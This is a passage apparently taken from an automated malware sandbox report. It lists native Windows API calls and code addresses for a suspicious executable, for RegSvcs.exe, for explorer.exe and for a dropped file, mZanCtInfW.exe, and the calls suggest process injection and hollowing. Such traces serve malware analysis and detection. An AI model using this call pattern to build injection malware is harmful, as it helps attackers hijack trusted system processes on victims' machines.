Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952D10 NtMapViewOfSection,LdrInitializeThunk,	9_2_01952D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952D30 NtUnmapViewOfSection,LdrInitializeThunk,	9_2_01952D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952CA0 NtQueryInformationToken,LdrInitializeThunk,	9_2_01952CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952C70 NtFreeVirtualMemory,LdrInitializeThunk,	9_2_01952C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952F90 NtProtectVirtualMemory,LdrInitializeThunk,	9_2_01952F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952FB0 NtResumeThread,LdrInitializeThunk,	9_2_01952FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952FE0 NtCreateFile,LdrInitializeThunk,	9_2_01952FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952F30 NtCreateSection,LdrInitializeThunk,	9_2_01952F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952E80 NtReadVirtualMemory,LdrInitializeThunk,	9_2_01952E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	9_2_01952EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01954340 NtSetContextThread,	9_2_01954340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01954650 NtSuspendThread,	9_2_01954650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952B80 NtQueryInformationFile,	9_2_01952B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952BA0 NtEnumerateValueKey,	9_2_01952BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952BE0 NtQueryValueKey,	9_2_01952BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952AB0 NtWaitForSingleObject,	9_2_01952AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952AF0 NtWriteFile,	9_2_01952AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952DB0 NtEnumerateKey,	9_2_01952DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952D00 NtSetInformationFile,	9_2_01952D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952CC0 NtQueryVirtualMemory,	9_2_01952CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952CF0 NtOpenProcess,	9_2_01952CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952C00 NtQueryInformationProcess,	9_2_01952C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952C60 NtCreateKey,	9_2_01952C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952FA0 NtQuerySection,	9_2_01952FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952F60 NtCreateProcessEx,	9_2_01952F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952EE0 NtQueueApcThread,	9_2_01952EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01952E30 NtWriteVirtualMemory,	9_2_01952E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01953090 NtSetValueKey,	9_2_01953090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01953010 NtOpenDirectoryObject,	9_2_01953010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019535C0 NtCreateMutant,	9_2_019535C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019539B0 NtGetContextThread,	9_2_019539B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01953D10 NtOpenProcessToken,	9_2_01953D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01953D70 NtOpenThread,	9_2_01953D70
Source: C:\Windows\explorer.exe	Code function: 10_2_1052EE12 NtProtectVirtualMemory,	10_2_1052EE12
Source: C:\Windows\explorer.exe	Code function: 10_2_1052D232 NtCreateFile,	10_2_1052D232
Source: C:\Windows\explorer.exe	Code function: 10_2_1052EE0A NtProtectVirtualMemory,	10_2_1052EE0A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472D10 NtMapViewOfSection,LdrInitializeThunk,	13_2_05472D10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472DD0 NtDelayExecution,LdrInitializeThunk,	13_2_05472DD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472DF0 NtQuerySystemInformation,LdrInitializeThunk,	13_2_05472DF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472C60 NtCreateKey,LdrInitializeThunk,	13_2_05472C60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472C70 NtFreeVirtualMemory,LdrInitializeThunk,	13_2_05472C70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472CA0 NtQueryInformationToken,LdrInitializeThunk,	13_2_05472CA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472F30 NtCreateSection,LdrInitializeThunk,	13_2_05472F30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472FE0 NtCreateFile,LdrInitializeThunk,	13_2_05472FE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	13_2_05472EA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472B60 NtClose,LdrInitializeThunk,	13_2_05472B60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472BE0 NtQueryValueKey,LdrInitializeThunk,	13_2_05472BE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	13_2_05472BF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472AD0 NtReadFile,LdrInitializeThunk,	13_2_05472AD0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054735C0 NtCreateMutant,LdrInitializeThunk,	13_2_054735C0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05474650 NtSuspendThread,	13_2_05474650
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05474340 NtSetContextThread,	13_2_05474340
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472D00 NtSetInformationFile,	13_2_05472D00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472D30 NtUnmapViewOfSection,	13_2_05472D30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472DB0 NtEnumerateKey,	13_2_05472DB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472C00 NtQueryInformationProcess,	13_2_05472C00
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472CC0 NtQueryVirtualMemory,	13_2_05472CC0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472CF0 NtOpenProcess,	13_2_05472CF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472F60 NtCreateProcessEx,	13_2_05472F60
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472F90 NtProtectVirtualMemory,	13_2_05472F90
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472FA0 NtQuerySection,	13_2_05472FA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472FB0 NtResumeThread,	13_2_05472FB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472E30 NtWriteVirtualMemory,	13_2_05472E30
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472EE0 NtQueueApcThread,	13_2_05472EE0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472E80 NtReadVirtualMemory,	13_2_05472E80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472B80 NtQueryInformationFile,	13_2_05472B80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472BA0 NtEnumerateValueKey,	13_2_05472BA0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472AF0 NtWriteFile,	13_2_05472AF0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05472AB0 NtWaitForSingleObject,	13_2_05472AB0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05473010 NtOpenDirectoryObject,	13_2_05473010
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05473090 NtSetValueKey,	13_2_05473090
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05473D70 NtOpenThread,	13_2_05473D70
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05473D10 NtOpenProcessToken,	13_2_05473D10
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_054739B0 NtGetContextThread,	13_2_054739B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A320 NtCreateFile,	13_2_0330A320
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A3D0 NtReadFile,	13_2_0330A3D0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A500 NtAllocateVirtualMemory,	13_2_0330A500
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A450 NtClose,	13_2_0330A450
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A31C NtCreateFile,	13_2_0330A31C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0330A4FB NtAllocateVirtualMemory,	13_2_0330A4FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0514A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,	13_2_0514A036
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05149BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,	13_2_05149BAF
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_0514A042 NtQueryInformationProcess,	13_2_0514A042
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 13_2_05149BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	13_2_05149BB2

Source: C:\Users\user\Desktop\890983726372673.exe	Code function: 1_2_00F54204	1_2_00F54204
Source: C:\Users\user\Desktop\890983726372673.exe	Code function: 1_2_00F5E074	1_2_00F5E074
Source: C:\Users\user\Desktop\890983726372673.exe	Code function: 1_2_00F57088	1_2_00F57088
Source: C:\Users\user\Desktop\890983726372673.exe	Code function: 1_2_00F57050	1_2_00F57050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00401030	9_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041D8FF	9_2_0041D8FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041DA63	9_2_0041DA63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041EBCE	9_2_0041EBCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041E561	9_2_0041E561
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041D566	9_2_0041D566
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402D90	9_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402D94	9_2_00402D94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00409E4B	9_2_00409E4B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00409E50	9_2_00409E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041DE74	9_2_0041DE74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00402FB0	9_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E01AA	9_2_019E01AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D81CC	9_2_019D81CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BA118	9_2_019BA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910100	9_2_01910100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A8158	9_2_019A8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B2000	9_2_019B2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192E3F0	9_2_0192E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E03E6	9_2_019E03E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DA352	9_2_019DA352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019A02C0	9_2_019A02C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0274	9_2_019C0274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019E0591	9_2_019E0591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920535	9_2_01920535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CE4F6	9_2_019CE4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C4420	9_2_019C4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D2446	9_2_019D2446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191C7C0	9_2_0191C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01944750	9_2_01944750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920770	9_2_01920770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193C6E0	9_2_0193C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019229A0	9_2_019229A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019EA9A6	9_2_019EA9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01936962	9_2_01936962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019068B8	9_2_019068B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0194E8F0	9_2_0194E8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01922840	9_2_01922840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192A840	9_2_0192A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D6BD7	9_2_019D6BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DAB40	9_2_019DAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191EA80	9_2_0191EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01938DBF	9_2_01938DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0191ADE0	9_2_0191ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BCD1F	9_2_019BCD1F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192AD00	9_2_0192AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C0CB5	9_2_019C0CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01910CF2	9_2_01910CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920C00	9_2_01920C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0199EFA0	9_2_0199EFA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01912FC8	9_2_01912FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192CFE0	9_2_0192CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01940F30	9_2_01940F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C2F30	9_2_019C2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01962F28	9_2_01962F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01994F40	9_2_01994F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01932E90	9_2_01932E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DCE93	9_2_019DCE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DEEDB	9_2_019DEEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DEE26	9_2_019DEE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01920E59	9_2_01920E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0192B1B0	9_2_0192B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190F172	9_2_0190F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019EB16B	9_2_019EB16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0195516C	9_2_0195516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CF0CC	9_2_019CF0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019270C0	9_2_019270C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D70E9	9_2_019D70E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DF0E0	9_2_019DF0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0196739A	9_2_0196739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D132D	9_2_019D132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0190D34C	9_2_0190D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019252A0	9_2_019252A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193B2C0	9_2_0193B2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C12ED	9_2_019C12ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BD5B0	9_2_019BD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D7571	9_2_019D7571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DF43F	9_2_019DF43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01911460	9_2_01911460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DF7B0	9_2_019DF7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D16CC	9_2_019D16CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019B5910	9_2_019B5910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01929950	9_2_01929950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193B950	9_2_0193B950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019238E0	9_2_019238E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0198D800	9_2_0198D800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193FB80	9_2_0193FB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01995BF0	9_2_01995BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0195DBF9	9_2_0195DBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DFB76	9_2_019DFB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01965AA0	9_2_01965AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019BDAAC	9_2_019BDAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019C1AA3	9_2_019C1AA3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019CDAC6	9_2_019CDAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DFA49	9_2_019DFA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D7A46	9_2_019D7A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01993A6C	9_2_01993A6C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0193FDC0	9_2_0193FDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D1D5A	9_2_019D1D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01923D40	9_2_01923D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019D7D73	9_2_019D7D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DFCF2	9_2_019DFCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01999C32	9_2_01999C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01921F92	9_2_01921F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DFFB1	9_2_019DFFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_018E3FD5	9_2_018E3FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_018E3FD2	9_2_018E3FD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019DFF09	9_2_019DFF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01929EB0	9_2_01929EB0
Source: C:\Windows\explorer.exe	Code function: 10_2_10380036	10_2_10380036
Source: C:\Windows\explorer.exe	Code function: 10_2_10377082	10_2_10377082
Source: C:\Windows\explorer.exe	Code function: 10_2_1037E912	10_2_1037E912
Source: C:\Windows\explorer.exe	Code function: 10_2_10378D02	10_2_10378D02
Source: C:\Windows\explorer.exe	Code function: 10_2_103845CD	10_2_103845CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10381232	10_2_10381232
Source: C:\Windows\explorer.exe	Code function: 10_2_1037BB32	10_2_1037BB32
Source: C:\Windows\explorer.exe	Code function: 10_2_1037BB30	10_2_1037BB30
Source: C:\Windows\explorer.exe	Code function: 10_2_1052D232	10_2_1052D232
Source: C:\Windows\explorer.exe	Code function: 10_2_1052C036	10_2_1052C036
Source: C:\Windows\explorer.exe	Code function: 10_2_10523082	10_2_10523082
Source: C:\Windows\explorer.exe	Code function: 10_2_1052A912	10_2_1052A912
Source: C:\Windows\explorer.exe	Code function: 10_2_10524D02	10_2_10524D02
Source: C:\Windows\explorer.exe	Code function: 10_2_10527B32	10_2_10527B32
Source: C:\Windows\explorer.exe	Code function: 10_2_10527B30	10_2_10527B30
Source: C:\Windows\explorer.exe	Code function: 10_2_105305CD	10_2_105305CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10854082	10_2_10854082
Source: C:\Windows\explorer.exe	Code function: 10_2_1085D036	10_2_1085D036
Source: C:\Windows\explorer.exe	Code function: 10_2_108615CD	10_2_108615CD
Source: C:\Windows\explorer.exe	Code function: 10_2_10855D02	10_2_10855D02
Source: C:\Windows\explorer.exe	Code function: 10_2_1085B912	10_2_1085B912
Source: C:\Windows\explorer.exe	Code function: 10_2_1085E232	10_2_1085E232
Source: C:\Windows\explorer.exe	Code function: 10_2_10858B30	10_2_10858B30
Source: C:\Windows\explorer.exe	Code function: 10_2_10858B32	10_2_10858B32
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_031B4204	12_2_031B4204
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_031BE074	12_2_031BE074
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_031B7053	12_2_031B7053
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_031B7088	12_2_031B7088
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_058C74C0	12_2_058C74C0
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_058C0120	12_2_058C0120
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_058C0130	12_2_058C0130
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_058C74B0	12_2_058C74B0
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781E738	12_2_0781E738
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781C6E0	12_2_0781C6E0
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_07814338	12_2_07814338
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781D210	12_2_0781D210
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781DD80	12_2_0781DD80
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781E72A	12_2_0781E72A
Source: C:\Users\user\AppData\Roaming\mZanCtInfW.exe	Code function: 12_2_0781C6DA	12_2_0781C6DA
